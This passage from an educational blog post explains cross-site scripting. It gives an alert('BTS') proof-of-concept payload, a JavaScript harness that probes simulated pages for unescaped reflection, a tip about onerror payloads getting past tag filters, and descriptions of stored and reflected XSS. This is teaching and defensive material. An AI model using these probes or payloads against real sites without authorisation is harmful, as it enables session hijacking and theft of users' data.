Now we know the site is probably vulnerable to XSS. But let us make sure the site is really exploitable by injecting a complete JavaScript snippet. For instance, let us input <script>alert('BTS')</script>.

If a pop-up box with the string 'BTS' appears, we have successfully exploited the XSS. By extending the code with a malicious script, an attacker can steal cookies, deface the site and more.
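The three tests above, automated as an added example (not code from the original post). Instead of a real website there are three simulated "search results for ..." pages, one that reflects the input raw, one that entity-encodes it and one that strips tags; the probe tells the three outcomes apart the same way you would by reading the page source. The page template, the marker "BTS" and the render functions are assumptions.

```javascript
// Added example (not from the original post). Assumed: the page template
// below and that the server echoes the search term into an <h1>.

// Minimal HTML entity encoder: what a correctly written server does.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// Three behaviours a server might have for the same search term.
function vulnerableSearchPage(q) {          // raw reflection
  return '<html><body><h1>Search results for ' + q + '</h1></body></html>';
}
function hardenedSearchPage(q) {            // entity-encoded
  return '<html><body><h1>Search results for ' + htmlEncode(q) + '</h1></body></html>';
}
function filteringSearchPage(q) {           // crude tag stripping
  return '<html><body><h1>Search results for ' + q.replace(/<[^>]*>/g, '') + '</h1></body></html>';
}

// Test 1: is the input reflected at all, and where in the source?
function findReflection(html, marker) {
  return html.indexOf(marker);              // -1 means not reflected
}

// Test 2: wrap the marker in a <script> tag and classify what comes back.
function probeReflection(renderPage, marker) {
  const tagged = '<script>' + marker + '</script>';
  const html = renderPage(tagged);
  if (html.indexOf(tagged) !== -1) return 'unescaped';      // tag survived: vulnerable
  if (html.indexOf(htmlEncode(tagged)) !== -1) return 'escaped';
  if (html.indexOf(marker) !== -1) return 'modified';       // reflected but altered
  return 'not-reflected';
}

// Test 3: confirm with the full alert payload from the walkthrough.
function confirmXss(renderPage) {
  const payload = "<script>alert('BTS')</script>";
  return renderPage(payload).indexOf(payload) !== -1;
}

const marker = 'BTS';
console.log('reflected at offset', findReflection(vulnerableSearchPage(marker), marker));
console.log('vulnerable:', probeReflection(vulnerableSearchPage, marker)); // unescaped
console.log('hardened:', probeReflection(hardenedSearchPage, marker));     // escaped
console.log('filtering:', probeReflection(filteringSearchPage, marker));   // modified
console.log('exploitable:', confirmXss(vulnerableSearchPage), confirmXss(hardenedSearchPage));
```

A "modified" result is not a pass: the tag stripper above removes <script>...</script> but not event handlers such as an <img onerror=...> attribute, so a filtered reflection needs further probing with payloads that do not use a script tag.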

Types of XSS based on persistence:
Based on persistence, XSS attacks fall into two types, namely Persistent and Non-Persistent.

Persistent XSS:

A Persistent or Stored XSS attack occurs when the malicious code submitted by the attacker is saved by the server (in the database, for example) and is then served as part of the normal page to every visitor.

For Example:   
Many websites host a support forum where registered users can ask questions by posting messages, which are stored in the database. Let us imagine an attacker posts a message containing malicious JavaScript code instead. If the server fails to sanitize the input, the injected script is executed whenever a user reads the post. If the injected code is cookie-stealing code, it will steal the cookie of every user who reads the post, and with that cookie the attacker can take over their accounts. (One caveat: cookies set with the HttpOnly flag cannot be read through document.cookie, so this particular payload does not work against them, although other attacks through the victim's browser still do.)


Non-Persistent XSS:

Non-Persistent XSS, also referred to as Reflected XSS, is the most common type of XSS found nowadays. In this type of attack, the injected code is sent to the server in the HTTP request. The server embeds the input in the HTML page and returns it to the browser in the HTTP response. When the browser renders the HTML, it also executes the embedded script. This kind of XSS vulnerability frequently occurs in search fields.

Example:
Let us consider a project hosting website. To find a project, we type a related word into the search box. When the search finishes, it displays a message like "search results for yourword". If the server fails to sanitize the input properly, the injected script is executed.

In reflected XSS attacks, the attacker sends a specially crafted link to victims and tricks them into clicking it. When the user clicks the link, the browser sends the injected code to the server, the server reflects it back in the response, and the browser executes it.

In addition to these two types, there is a third type called DOM-based XSS, which I will explain in a later post.

What can an attacker do with this Vulnerability?
  • Stealing identity and confidential data (credit card details).
  • Bypassing restrictions in websites.
  • Session hijacking (stealing sessions)
  • Malware attacks
  • Website defacement
  • Denial of Service attacks (DoS)

Disclaimer:
This article is intended for educational purpose only.